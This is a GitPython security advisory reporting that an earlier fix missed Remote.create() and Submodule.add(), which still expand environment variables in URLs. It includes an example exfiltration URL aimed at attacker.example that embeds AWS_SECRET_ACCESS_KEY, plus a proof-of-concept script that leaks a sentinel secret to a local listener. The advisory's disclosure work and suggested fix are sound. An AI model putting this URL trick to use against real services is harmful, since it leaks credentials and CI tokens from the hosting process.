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Environment-variable exfiltration via Repo.create_remote() / Remote.add() URL (incomplete fix of GHSA-rwj8-pgh3-r573)

High
Byron published GHSA-94p4-4cq8-9g67 Jul 23, 2026

Package

pip GitPython (pip)

Affected versions

<= 3.1.53

Patched versions

>= 3.1.55

Description

Summary

The fix for GHSA-rwj8-pgh3-r573 stopped Repo.clone_from() from running caller-supplied URLs through os.path.expandvars(), but it guarded only that one caller. Remote.create() — reached from the public Repo.create_remote() and its Remote.add() alias — still passes an attacker-influenceable URL through Git.polish_url() with the default expand_vars=True. A URL such as http://attacker.example/${AWS_SECRET_ACCESS_KEY}/repo.git is expanded server-side to embed the hosting process's environment secret, written into .git/config, and then transmitted to the attacker's host on the next fetch/pull. This is the same primitive and same "import repository from URL" threat model the advisory describes, via the sibling caller the fix missed.

Root Cause

Fix commit 8ac5a305 added an expand_vars parameter to Git.polish_url() (default True) and used expand_vars=False only in Repo._clone() (git/repo/base.py:1455). The shared helper's dangerous default was left in place, and the other callers were not updated.

git/remote.py:811, Remote.create:

url = Git.polish_url(url)                 # expand_vars=True -> os.path.expandvars(url)
if not allow_unsafe_protocols:
    Git.check_unsafe_protocols(url)       # https:// carrying the secret passes
repo.git.remote(scmd, "--", name, url, **kwargs)   # expanded URL written to .git/config

check_unsafe_protocols() runs after expansion here, so it rejects an ext:: payload but does nothing about an https:// URL that carries an expanded secret in its path or host — the disclosure primitive.

The same unguarded call also sits at git/objects/submodule/base.py:611 (Submodule.add), which writes the expanded URL into .gitmodules (a tracked file) and .git/config.

Steps to Reproduce

Prerequisites

  • Python 3.9+
  • git on PATH (for the fetch step)
  • GitPython 3.1.53 (installed below)

Step 1: Install GitPython 3.1.53 in a clean venv

mkdir /tmp/gp-remote-poc && cd /tmp/gp-remote-poc
python3 -m venv venv
./venv/bin/pip install gitpython==3.1.53

Step 2: Write the PoC

cat > poc.py <<'PYEOF'
#!/usr/bin/env python3
"""Env-var exfiltration via Repo.create_remote() URL. Sentinel data only."""
import http.server
import os
import tempfile
import threading

import git

print("gitpython version:", git.__version__)

# Sentinel standing in for a process secret such as AWS_SECRET_ACCESS_KEY.
SENTINEL = "leaked-a1b2c3-SENTINEL-do-not-use"
os.environ["GP_SENTINEL_SECRET"] = SENTINEL

# Local HTTP server standing in for attacker.example.
captured = []


class Handler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        captured.append(self.path)
        self.send_response(404)
        self.end_headers()

    def log_message(self, *a):
        pass


srv = http.server.HTTPServer(("127.0.0.1", 0), Handler)
port = srv.server_address[1]
threading.Thread(target=srv.serve_forever, daemon=True).start()

# Attacker-controlled URL handed to an "import from URL" feature.
attacker_url = "http://127.0.0.1:%d/steal/${GP_SENTINEL_SECRET}/repo.git" % port


def norm(s):  # display the ephemeral listener port as a stable placeholder
    return s.replace("127.0.0.1:%d" % port, "127.0.0.1:PORT")


print("attacker-supplied URL :", norm(attacker_url))

repo = git.Repo.init(tempfile.mkdtemp(prefix="gp-victim-"))
remote = repo.create_remote("evil", attacker_url)   # public API

stored = repo.remote("evil").url
print("stored remote URL     :", norm(stored))
print("SENTINEL in git config:", SENTINEL in stored)

try:
    remote.fetch()          # transmits the expanded URL to the attacker host
except Exception:
    pass                    # fetch fails after the request is already sent

srv.shutdown()
over_network = any(SENTINEL in p for p in captured)
print("HTTP paths received   :", [norm(p) for p in captured])
print("SENTINEL over network :", over_network)

print()
if SENTINEL in stored and over_network:
    print("VULNERABLE: env-var expanded into stored URL AND transmitted to attacker host")
elif SENTINEL in stored:
    print("VULNERABLE: env-var expanded into stored git-config URL")
else:
    print("not reproduced")
PYEOF

Step 3: Run it

cd /tmp/gp-remote-poc && ./venv/bin/python poc.py

Expected output (the listener's ephemeral port is shown as PORT):

gitpython version: 3.1.53
attacker-supplied URL : http://127.0.0.1:PORT/steal/${GP_SENTINEL_SECRET}/repo.git
stored remote URL     : http://127.0.0.1:PORT/steal/leaked-a1b2c3-SENTINEL-do-not-use/repo.git
SENTINEL in git config: True
HTTP paths received   : ['/steal/leaked-a1b2c3-SENTINEL-do-not-use/repo.git/info/refs?service=git-upload-pack']
SENTINEL over network : True

VULNERABLE: env-var expanded into stored URL AND transmitted to attacker host

The ${GP_SENTINEL_SECRET} token in the supplied URL is replaced with the environment value both in the stored .git/config URL and in the request that reaches the attacker-controlled host.

Suggested Fix

Pass expand_vars=False at the remaining URL callers, matching the clone fix:

  • git/remote.py Remote.create: url = Git.polish_url(url, expand_vars=False)
  • git/objects/submodule/base.py Submodule.add: url = Git.polish_url(url, expand_vars=False)

More robustly, flip the Git.polish_url() default to expand_vars=False (env-var expansion on a URL is never desirable for network remotes) and require callers that genuinely normalize local paths to opt in.

Cleanup

rm -rf /tmp/gp-remote-poc

Impact

Any secret in the hosting process environment (AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN, CI/CD tokens) is disclosed to an attacker who controls a remote URL passed to Repo.create_remote() / Remote.add(). The secret is expanded into .git/config immediately and transmitted over the network (DNS + HTTP) on the next fetch/pull/remote update. This is the documented "import repository from URL" attacker model of GHSA-rwj8-pgh3-r573 — CI servers, git-hosting mirrors, and dependency scanners — applied to the add-a-remote flow, which the clone-only fix did not cover. The same disclosure reaches .gitmodules (a committable file) via Submodule.add().

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE ID

No known CVE

Weaknesses

Exposure of Sensitive Information to an Unauthorized Actor

The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. Learn more on MITRE.

Invocation of Process Using Visible Sensitive Information

A process is invoked with sensitive command-line arguments, environment variables, or other elements that can be seen by other processes on the operating system. Learn more on MITRE.

Credits